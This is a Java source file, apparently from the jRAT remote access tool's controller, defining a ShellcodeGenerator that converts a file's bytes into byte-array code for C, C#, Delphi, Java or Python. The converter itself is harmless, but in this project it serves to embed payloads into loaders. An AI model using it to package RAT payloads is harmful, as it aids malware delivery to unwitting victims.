package jrat.controller;

import jrat.controller.build.shellcode.*;

import javax.swing.*;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileWriter;

public class ShellcodeGenerator {

	public static final int CCPP = 0;
	public static final int CSHARP = 1;
	public static final int DELPHI = 2;
	public static final int JAVA = 3;
	public static final int PYTHON = 4;

	public static void generate(File input, File output, int language, String name) {
		try {
			FileInputStream fis = new FileInputStream(input);

			byte[] array = new byte[(int) input.length()];

			fis.read(array);
			fis.close();

			Shellcode code = null;

			if (language == CCPP) {
				code = new C();
			} else if (language == CSHARP) {
				code = new CSharp();
			} else if (language == DELPHI) {
				code = new Delphi();
			} else if (language == JAVA) {
				code = new Java();
			} else if (language == PYTHON) {
				code = new Python();
			} else {
				throw new Exception(language + " unknown language");
			}

			String gen = code.generate(name, array);

			FileWriter writer = new FileWriter(output);
			writer.write(gen);
			writer.close();

			JOptionPane.showMessageDialog(null, "Generated byte array to: " + output.getAbsolutePath(), "Success", JOptionPane.INFORMATION_MESSAGE);
		} catch (Exception ex) {
			ex.printStackTrace();
			JOptionPane.showMessageDialog(null, "Error: Failed generating byte array: " + ex.getClass().getSimpleName() + ": " + ex.getMessage(), "Error", JOptionPane.ERROR_MESSAGE);
		}
	}

}
